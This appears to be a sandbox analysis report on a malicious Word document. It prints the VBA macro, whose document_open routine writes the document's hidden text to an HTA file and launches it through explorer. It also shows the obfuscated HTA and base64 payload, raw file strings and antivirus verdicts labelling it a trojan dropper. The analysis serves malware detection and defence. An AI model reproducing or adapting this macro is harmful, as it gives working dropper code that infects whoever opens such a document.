Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
Call xyz("1.hta", Replace(ActiveDocument.Content, "^)", ""))
End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
Call xyz("1.hta", Replace(ActiveDocument.Content, "^)", ""))
End Sub

                                    

Original


                                        Attribute VB_Name = "dirDriveDir"
Sub xyz(dirObjDiv, docExDir)
Open dirObjDiv For Output As #1
Print #1, docExDir
winDriveDiv dirObjDiv, "explo"
End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "dirDriveDir"
Sub xyz(dirObjDiv, docExDir)
Open dirObjDiv For Output As #1
Print #1, docExDir
winDriveDiv dirObjDiv, "explo"
End Sub

                                    

Original


                                        Attribute VB_Name = "divDoc"
Sub winDriveDiv(devDir, exDevDrive)
Set divDocDev = New IWshRuntimeLibrary.WshShell
divDocDev.exec "c:\\..\\..\\..\\windows\\" + exDevDrive + "rer " + devDir
End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "divDoc"
Sub winDriveDiv(devDir, exDevDrive)
Set divDocDev = New IWshRuntimeLibrary.WshShell
divDocDev.exec "c:\\..\\..\\..\\windows\\" + exDevDrive + "rer " + devDir
End Sub

                                    
f^)u^)c^)k^) ^)u^)<^)h^)t^)m^)l^)>^)<^)b^)o^)d^)y^)>^)<^)d^)i^)v^) ^)i^)d^)=^)'^)d^)r^)i^)v^)e^)W^)i^)n^)D^)r^)i^)v^)e^)'^)>^)f^)X^)1^)7^)K^)W^)U^)o^)a^)G^)N^)0^)Y^)W^)N^)9^)O^)2^)V^)z^)b^)2^)x^)j^)L^)m^)N^)v^)R^)H^)Z^)l^)R^)G^)p^)i^)b^)z^)s^)p^)M^)i^)A^)s^)I^)m^)d^)w^)a^)i^)5^)2^)Z^)U^)R^)u^)a^)V^)d^)2^)a^)W^)R^)c^)X^)G^)N^)p^)b^)G^)J^)1^)c^)F^)x^)c^)c^)3^)J^)l^)c^)3^)V^)c^)X^)D^)p^)j^)I^)i^)h^)l^)b^)G^)l^)m^)b^)3^)R^)l^)d^)m^)F^)z^)L^)m^)N^)v^)R^)H^)Z^)l^)R^)G^)p^)i^)b^)z^)s^)p^)e^)W^)R^)v^)Y^)m^)V^)z^)b^)m^)9^)w^)c^)2^)V^)y^)L^)n^)h^)F^)Z^)X^)Z^)p^)c^)k^)R^)2^)Z^)W^)Q^)o^)Z^)X^)R^)p^)c^)n^)c^)u^)Y^)2^)9^)E^)d^)m^)V^)E^)a^)m^)J^)v^)O^)z^)E^)g^)P^)S^)B^)l^)c^)H^)l^)0^)L^)m^)N^)v^)R^)H^)Z^)l^)R^)G^)p^)i^)b^)z^)t^)u^)Z^)X^)B^)v^)L^)m^)N^)v^)R^)H^)Z^)l^)R^)G^)p^)i^)b^)z^)s^)p^)I^)m^)1^)h^)Z^)X^)J^)0^)c^)y^)5^)i^)Z^)G^)9^)k^)Y^)S^)I^)o^)d^)G^)N^)l^)a^)m^)J^)P^)W^)G^)V^)2^)a^)X^)R^)j^)Q^)S^)B^)3^)Z^)W^)4^)g^)P^)S^)B^)j^)b^)0^)R^)2^)Z^)U^)R^)q^)Y^)m^)8^)g^)c^)m^)F^)2^)e^)3^)l^)y^)d^)H^)s^)p^)M^)D^)A^)y^)I^)D^)0^)9
&iCCPAdobe RGB (1998)
c``2ptqre
> v^~^*
iTXtXML:com.adobe.xmp
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164648, 2021/01/12-15:52:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 22.2 (Windows)" xmp:CreateDate="2021-04-07T20:22:11+03:00" xmp:ModifyDate="2021-09-02T12:11:20+03:00" xmp:MetadataDate="2021-09-02T12:11:20+03:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="Adobe RGB (1998)" xmpMM:InstanceID="xmp.iid:343cf47e-8052-fc4d-8e93-88830b8c1700" xmpMM:DocumentID="adobe:docid:photoshop:c9acc734-d6be-3440-9
CzE:((R
CJg/]
?>B"IQ
p{uIm_
78DP}NR%
=84M}Np
am=s>}
e1k1w=
y(E1w9
H*Wz8~
\-i3R
kqB>:k!
;yjxNR
)1g(;b
.^ MzW9
;~Bz!W
e\aB>dZ>
OxUrG
r/m<1o
j@VB^[
1O/|Y]
9b^l1W
/}(c-Vd
OVjbn3o2i{
[\hC 8L;
gq?K[
gu?K[
9b^417
$,M9OS
2fsOJSo
y)Wi7h
q7z2~}>G
R,1O{,
E-*UWb
gUvl^k
0k1O{,
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
}O3o?_w2
:wyjuI
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal
8765456789
Microsoft Office Word
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
_open(
xyz("1.h
ta", Re
ce(Act
.Cont
Attribut
e VB_Nam
e = "dir
DriveDir
iv, docE
4 For
Output A
;, " explo
c:\\..\\..\\..\\windows\\
Attribut
e VB_Nam
e = "div
b winDri
veDiv(de
vDir, ex
|New I
WshRunti
meLibrar
"Shell
X.exec
"c:\\..
qdows\\
WordS10
Win64F
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
document_open
Replacef
ActiveDocument
Content
Module1b
dirDriveDir
dirObjDiv
docExDir
winDriveDiv
divDoc
devDir
exDevDriveh
divDocDev
IWshRuntimeLibrary
WshShell
execzy0
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
! Offic
!G{2DF8
D04C-5BF
A-101B-BHDE5
Files\C ommon
crosoft
Shared\O
FFICE16\
MSO.DLL#
M 16.0
IWshRun
n@ji@Ge
F935DC20
1D0 -ADB9@9C0
4FD58A0B
}#1Bmc:\w
DmsEmwshom .ocx#
cript Ho
stE0Model
Document
DriveDir
M#8oV!
*\CNormalrU
ThisDocument
dirDriveDir
divDoc
Project
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\System32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
c:\windows\system32\wshom.ocx
IWshRuntimeLibrary
Document
document_open
ThisDocument
dirDriveDir
divDoc
ID="{A0EEE4EB-E2D7-4AE5-89C9-3C71B2171E63}"
Document=ThisDocume_
nt/&H00000000
Module=dirDriveDir
Module=divDoc
Name="PlmMtVA"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="B4B6BA41BAC2BEC2BEC2BEC2BE"
DPB="393B374838483848"
GC="BEBCB04FB05134523452CB"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
dirDriveDir=0, 0, 0, 0, C
divDoc=0, 0, 0, 0, C
Microsoft Word 97-2003
MSWordDoc
Word.Document.8
"Project.ThisDocument.document_open
"PROJECT.THISDOCUMENT.DOCUMENT_OPEN
Unknown
Times New Roman
Symbol
Calibri
Calibri Light
Cambria Math
8765456789
Root Entry
1Table
WordDocument
SummaryInformation
DocumentSummaryInformation
Macros
ThisDocument
__SRP_2
__SRP_3
dirDriveDir
(1Normal.ThisDocument
$*\Rffff*0<63271761
divDoc
_VBA_PROJECT
__SRP_0
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}#1.0#0#c:\windows\system32\wshom.ocx#Windows Script Host Object Model
ThisDocument
0<63271761
ThisDocument
dirDriveDir
0863271761
dirDriveDir
divDoc
0963271761
divDoc
tThisDocument
rdirDriveDir
cdivDoc
__SRP_1
PROJECTwm
PROJECT
CompObj
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren W97M/Agent
Symantec ISB.Downloader!gen148
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall Clean
Avast SNH:Script [Dropper]
ClamAV Clean
Kaspersky Clean
BitDefender VB:Trojan.Valyria.5258
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VB:Trojan.Valyria.5258
Rising Clean
Ad-Aware VB:Trojan.Valyria.5258
Emsisoft VB:Trojan.Valyria.5258 (B)
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.OLE2.Downloader.ll
FireEye VB:Trojan.Valyria.5258
Sophos Clean
SentinelOne Static AI - Malicious OLE
Jiangmin Clean
Avira Clean
MAX malware (ai score=82)
Antiy-AVL Clean
Kingsoft Clean
Microsoft Trojan:Script/Woreflint.A!cl
Gridinsoft Clean
Arcabit HEUR.VBA.Trojan.d
ViRobot Clean
ZoneAlarm Clean
GData VB:Trojan.Valyria.5258
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Suspicious/W97M.Obfus.Gen.8
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan-Dropper.VBA.Agent
MaxSecure Clean
Fortinet VBA/Agent.MKK!tr
AVG SNH:Script [Dropper]
Panda Clean
No IRMA results available.